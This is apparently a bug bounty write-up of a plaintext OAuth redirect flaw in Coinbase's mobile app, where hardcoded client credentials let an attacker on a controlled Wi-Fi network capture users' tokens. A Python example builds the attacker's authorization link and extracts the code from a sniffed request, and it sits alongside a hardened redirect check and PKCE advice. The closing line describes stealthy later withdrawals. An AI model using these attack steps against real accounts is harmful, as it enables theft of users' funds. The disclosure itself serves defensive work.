Bug Bounty: Insecure mobile app OAuth redirect on Coinbase.com


This is a simple demo of a small bug I found in Coinbase.com's mobile app configuration. From the mobile app's source code it was easy to see that their OAuth application was registered to return the token to http://example.com/coinbase-token, and that the app caught that URL and extracted the token before the request ever left the device. The problem is that the client_id and client_secret are hardcoded in the app, so an attacker can reuse them to start the OAuth flow and force a user who has authorized the Coinbase mobile app to send their authentication token over a plaintext HTTP connection, where anyone on the network path can read it. This is a particular problem in a point-of-sale setting, where a malicious merchant or attacker typically controls the Wi-Fi network the user connects to and can direct the victim to a website or QR code ("Like Us" / "Tweet Us" to get a free cookie).
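
To make the mechanism concrete, here is an added example (not code from this write-up and not Coinbase's own) showing both halves of the problem: the attacker side, which builds the authorization link with the hardcoded client_id and then reads the OAuth parameters straight out of a captured plaintext request to example.com, and the authorization-server side, a redirect_uri check that would have refused the http:// registration in the first place. The authorization endpoint, client_id, code and state values, and the registered redirect list are placeholders, the captured request is constructed for the example, and the assumption that the redirect carries an authorization code in a `code` query parameter (standard OAuth 2.0 code flow) is mine, not the write-up's.

```python
"""Added example, not code from the write-up or from Coinbase: the attacker-side
view of a plaintext OAuth redirect, and the server-side redirect_uri check that
prevents it. Assumptions not taken from the write-up: the redirect carries an
authorization code in a `code` query parameter (standard OAuth 2.0 code flow);
the endpoint, client_id, code and state values are placeholders; the captured
request is constructed for this example."""
from urllib.parse import parse_qs, urlencode, urlsplit

# The redirect the write-up says the app was registered with.
PLAINTEXT_REDIRECT = "http://example.com/coinbase-token"

# Constructed sample of what a passive observer on the Wi-Fi sees when the
# victim's browser follows that redirect. Host and path are the ones from the
# write-up; the code and state values are made up.
CAPTURED_REQUEST = (
    b"GET /coinbase-token?code=SplxlOBeZQQYbYS6WxSbIA&state=free-cookie HTTP/1.1\r\n"
    b"Host: example.com\r\n"
    b"User-Agent: Mozilla/5.0 (iPhone)\r\n"
    b"\r\n"
)


def build_authorize_url(authorize_endpoint: str, client_id: str, state: str) -> str:
    """Attacker step: the link (or QR code) handed to the victim. Because the
    client_id is hardcoded in the app, anyone can start the flow with it, and
    the registered plaintext redirect_uri is where the code will be sent."""
    query = urlencode({
        "response_type": "code",
        "client_id": client_id,
        "redirect_uri": PLAINTEXT_REDIRECT,
        "state": state,
    })
    return f"{authorize_endpoint}?{query}"


def extract_oauth_params(raw_request: bytes) -> dict:
    """Attacker step: pull the OAuth parameters out of a captured plaintext HTTP
    request. Only the request line matters: the path and query string travel in
    the clear, so the code (or token) is readable by anyone on the network path."""
    request_line = raw_request.split(b"\r\n", 1)[0].decode("ascii", errors="replace")
    _method, target, _version = request_line.split(" ", 2)
    query = urlsplit(target).query
    return {name: values[0] for name, values in parse_qs(query).items()}


def redirect_uri_allowed(requested: str, registered: frozenset) -> bool:
    """Hardened authorization-server check (generic, not Coinbase's): accept only
    an exact string match against the registered list, and never a plaintext
    http:// URI. https or an app-claimed custom scheme keeps the code off the
    open network; exact matching blocks path and host tricks such as '/../'
    suffixes or 'wallet.example.com.evil.net'."""
    if requested not in registered:
        return False
    return urlsplit(requested).scheme.lower() != "http"


# Hypothetical registered redirects for a mobile client: an app-specific scheme
# the app claims on the device, or an https callback.
REGISTERED_REDIRECTS = frozenset({
    "com.example.wallet://oauth/callback",
    "https://wallet.example.com/oauth/callback",
})

if __name__ == "__main__":
    url = build_authorize_url("https://auth.example.com/oauth/authorize",
                              "HARDCODED_CLIENT_ID", "free-cookie")
    print("victim is sent to:", url)
    print("attacker reads from the wire:", extract_oauth_params(CAPTURED_REQUEST))
    print("plaintext redirect accepted by hardened check?",
          redirect_uri_allowed(PLAINTEXT_REDIRECT, REGISTERED_REDIRECTS))
```

Two points worth noting: a client_secret compiled into a mobile app is not a secret, so the redirect_uri check is what actually keeps the code away from a network observer, not the secret; and binding the code to the client that started the flow with PKCE (RFC 7636) is the standard way to stop a captured code from being redeemed by someone else.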

Once the attacker has captured the OAuth token, they can continually refresh it and withdraw from the victim's account only later, once nobody is paying attention to them any more.
